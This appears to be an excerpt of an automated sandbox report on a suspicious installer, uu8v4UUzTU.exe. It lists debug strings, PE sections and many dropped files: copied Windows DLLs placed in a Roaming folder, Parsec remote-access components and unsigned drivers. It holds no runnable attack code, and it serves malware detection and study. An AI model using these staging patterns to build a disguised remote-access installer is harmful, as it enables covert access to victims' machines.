Source: Binary string: D:\gitsrc\parsec-cloud\usb-ip\pcvudhc\x64\Release\parsecvusba.pdb source: drvinst.exe, 00000037.00000003.2032436401.000002B48D5F1000.00000004.00000020.00020000.00000000.sdmp, SETDCF0.tmp.53.dr, parsecvusba.sys.46.dr
Source: Binary string: SystemEventsBrokerClient.pdbUGP source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: dmcfgutils.pdbUGP source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: lockappbroker.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Windows.UI.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: dmcfgutils.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: verifier.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: netlogon.pdbUGP source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wiashext.pdbGCTL source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: TpmTool.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: sscore.pdbUGP source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: xpsservices.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: TrustedSignalCredProv.pdb source: is-NRIH7.tmp.1.dr
Source: Binary string: Windows.UI.pdbUGP source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cryptdlg.pdbGCTL source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wlanext.pdbGCTL source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: is-I39R4.tmp.1.drStatic PE information: 0xC9B97BBC [Wed Mar 31 00:30:52 2077 UTC]
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 5_2_00466550 GetCurrentProcess,GetProcessTimes,memset,GetModuleHandleW,GetProcAddress,LoadLibraryW,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,fputs,fputs,fputs,fputs,5_2_00466550
Source: uu8v4UUzTU.exeStatic PE information: section name: .didata
Source: uu8v4UUzTU.tmp.0.drStatic PE information: section name: .didata
Source: is-O0GNS.tmp.1.drStatic PE information: section name: .didat
Source: is-61CCU.tmp.1.drStatic PE information: section name: .didat
Source: is-CEDA5.tmp.1.drStatic PE information: section name: .didat
Source: is-DQG3S.tmp.1.drStatic PE information: section name: .didata
Source: is-NRIH7.tmp.1.drStatic PE information: section name: .didat
Source: is-9HECR.tmp.1.drStatic PE information: section name: .didat
Source: is-IJKK2.tmp.1.drStatic PE information: section name: .didat
Source: is-4HGOQ.tmp.1.drStatic PE information: section name: .didat
Source: is-HI4IL.tmp.1.drStatic PE information: section name: .didat
Source: is-G4CQT.tmp.1.drStatic PE information: section name: .didat
Source: is-HA8AR.tmp.1.drStatic PE information: section name: .didat
Source: is-PGRCJ.tmp.1.drStatic PE information: section name: .didat
Source: is-1L3B3.tmp.1.drStatic PE information: section name: .didat
Source: is-HQ9KB.tmp.1.drStatic PE information: section name: .didat
Source: is-ULHI4.tmp.1.drStatic PE information: section name: .didat
Source: is-6DK0L.tmp.1.drStatic PE information: section name: .didat
Source: is-BOVF1.tmp.1.drStatic PE information: section name: .didat
Source: is-0LBKR.tmp.1.drStatic PE information: section name: .didat
Source: is-H8DB6.tmp.1.drStatic PE information: section name: .didat
Source: is-G92OK.tmp.1.drStatic PE information: section name: .didata
Source: is-K5NEU.tmp.1.drStatic PE information: section name: .didat
Source: teams.exe.12.drStatic PE information: section name: _RDATA
Source: parsecd.exe.12.drStatic PE information: section name: _RDATA
Source: pservice.exe.12.drStatic PE information: section name: _RDATA
Source: parsecd-150-93b.dll.12.drStatic PE information: section name: .detourc
Source: parsecd-150-93b.dll.12.drStatic PE information: section name: .detourd
Source: parsecd-150-93b.dll.12.drStatic PE information: section name: _RDATA
Source: nefconc.exe.46.drStatic PE information: section name: .detourc
Source: nefconc.exe.46.drStatic PE information: section name: .detourd
Source: nefconc.exe.46.drStatic PE information: section name: _RDATA
Source: nefconw.exe.46.drStatic PE information: section name: .detourc
Source: nefconw.exe.46.drStatic PE information: section name: .detourd
Source: nefconw.exe.46.drStatic PE information: section name: _RDATA
Source: parsecvusba.sys.46.drStatic PE information: section name: PAGED
Source: SETDCF0.tmp.53.drStatic PE information: section name: PAGED
Source: SETDEC5.tmp.55.drStatic PE information: section name: PAGED
Source: nefconw.exe.66.drStatic PE information: section name: .detourc
Source: nefconw.exe.66.drStatic PE information: section name: .detourd
Source: nefconw.exe.66.drStatic PE information: section name: _RDATA
Source: mm.dll.66.drStatic PE information: section name: _RDATA
Source: SETFD68.tmp.74.drStatic PE information: section name: _RDATA
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 5_2_0043F496 push rcx; ret 5_2_0043F497
Source: C:\Program Files\Parsec\pservice.exeCode function: 40_2_00007FF7EC03569C push rax; retf 0000h40_2_00007FF7EC03569D
Source: is-HQ9KB.tmp.1.drStatic PE information: section name: .text entropy: 7.183765567357945

Persistence and Installation Behavior

barindex
Creates files in the system32 config directory
Source: C:\Program Files\Parsec\pservice.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB
Source: C:\Program Files\Parsec\pservice.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB
Source: C:\Program Files\Parsec\pservice.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
Source: C:\Program Files\Parsec\pservice.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
Source: C:\Program Files\Parsec\pservice.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_DD342DC083F9240614EBCF70523A8426
Source: C:\Program Files\Parsec\pservice.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_DD342DC083F9240614EBCF70523A8426
Sample is not signed and drops a device driver
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeFile created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba\parsecvusba.sys
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeFile created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds\parsecvirtualds.sys
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-6EGJL.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-MGUI8.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-NRIH7.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\verifier.dll (copy)Jump to dropped file
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeFile created: C:\Users\user\AppData\Local\Temp\{07ec11c3-0442-934e-b5ee-7c271dda5618}\parsecvusba.sys (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-CEDA5.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\7z.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Local\Temp\is-4VCD0.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-P56QD.tmpJump to dropped file
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeFile created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-86N5H.tmpJump to dropped file
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeFile created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeJump to dropped file
Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\Temp\{0d19f94d-19ef-cf46-8004-7828b47b053d}\parsecvirtualds.sys (copy)Jump to dropped file
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeFile created: C:\Program Files\Parsec\pservice.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\LockAppBroker.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\icuin.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeFile created: C:\Program Files\Parsec\vusb\parsec-vud.exeJump to dropped file
Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\Temp\{0d19f94d-19ef-cf46-8004-7828b47b053d}\SETE85A.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-1CLR0.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-H8DB6.tmpJump to dropped file
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeFile created: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\kbdibm02.DLL (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\netlogon.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\UserDataAccessRes.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\shrpubw.exe (copy)Jump to dropped file
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeFile created: C:\Users\user\AppData\Local\Temp\{07ec11c3-0442-934e-b5ee-7c271dda5618}\SETDCF0.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\wlanext.exe (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\dmcfgutils.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\TpmTool.exe (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\gp548-win64-mingw.exe (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-4SSD7.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\MCRecvSrc.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-PBFIO.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-G4CQT.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\sscore.dll (copy)Jump to dropped file
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeFile created: C:\Users\user\AppData\Local\Temp\{bea99733-6925-1c45-8b38-88de72198ece}\parsecvirtualds.sys (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-QSA3H.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\MFWMAAEC.DLL (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-4HGOQ.tmpJump to dropped file
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeFile created: C:\Program Files\Parsec\uninstall.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-DQG3S.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-BUN5H.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\VscMgrPS.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\rdvgocl32.dll (copy)Jump to dropped file
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeFile created: C:\Users\user\AppData\Local\Temp\{bea99733-6925-1c45-8b38-88de72198ece}\SETE77F.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-61CCU.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-USCFG.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\SystemEventsBrokerClient.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\mcbuilder.exe (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\VAN.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\Windows.UI.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-60VI8.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\TrustedSignalCredProv.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\xwreg.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeFile created: C:\Program Files\Parsec\vdd\parsec-vdd.exeJump to dropped file
Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\Temp\{6f78882e-1a3d-dc43-867f-898abe828d58}\parsecvusba.sys (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\IEAdvpack.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-ULHI4.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\Windows.ApplicationModel.ConversationalAgent.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\unins000.exe (copy)Jump to dropped file
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeFile created: C:\Users\user\AppData\Local\Temp\nstD696.tmp\UserInfo.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-UI7FB.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\mfc140enu.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\networkhelper.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\wiashext.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\kbd101b.DLL (copy)Jump to dropped file
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeFile created: C:\Program Files\Parsec\skel\parsecd-150-93b.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-8G60N.tmpJump to dropped file
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeFile created: C:\Program Files\Parsec Virtual USB Adapter Driver\uninstall.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-K5NEU.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-HI4IL.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\socialapis.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\tapiui.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\dskquoui.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-HA8AR.tmpJump to dropped file
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeFile created: C:\Users\user\AppData\Local\Temp\nsvA814.tmp\nsExec.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\RdpSaUacHelper.exe (copy)Jump to dropped file
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeFile created: C:\Program Files\Parsec\teams.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-H42SM.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\KBDA3.DLL (copy)Jump to dropped file
Source: C:\Users\user\Desktop\uu8v4UUzTU.exeFile created: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-6DK0L.tmpJump to dropped file
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeFile created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba\parsecvusba.sysJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-O0GNS.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-1L3B3.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-N73AH.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-JRFAI.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\ws2help.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-2V0O4.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\7z.exe (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-BK2QC.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-L6U16.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-PGRCJ.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\runonce.exe (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-IJKK2.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\WSClient.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeFile created: C:\Users\user\AppData\Local\Temp\nsvA814.tmp\nsDialogs.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeFile created: C:\Users\user\AppData\Local\Temp\nsvA814.tmp\ApplicationID.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\getuname.dll (copy)Jump to dropped file
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeFile created: C:\Users\user\AppData\Local\Temp\nscF857.tmp\nsExec.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-9HECR.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-39NTG.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\SyncInfrastructureps.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-MHHB2.tmpJump to dropped file
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeFile created: C:\Program Files\Parsec Virtual Display Driver\uninstall.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-BOVF1.tmpJump to dropped file
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeFile created: C:\Users\user\AppData\Local\Temp\{d69aa289-d543-ea4a-a8fd-892bf2d05645}\SETFD68.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-I39R4.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-HCV6V.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\wups.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeFile created: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeJump to dropped file
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeFile created: C:\Users\user\AppData\Local\Temp\nstD696.tmp\System.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\cryptdlg.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-G92OK.tmpJump to dropped file
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeFile created: C:\Users\user\AppData\Local\Temp\{d69aa289-d543-ea4a-a8fd-892bf2d05645}\mm.dll (copy)Jump to dropped file
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeFile created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds\parsecvirtualds.sysJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\netevent.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-HQ9KB.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\MP43DECD.DLL (copy)Jump to dropped file
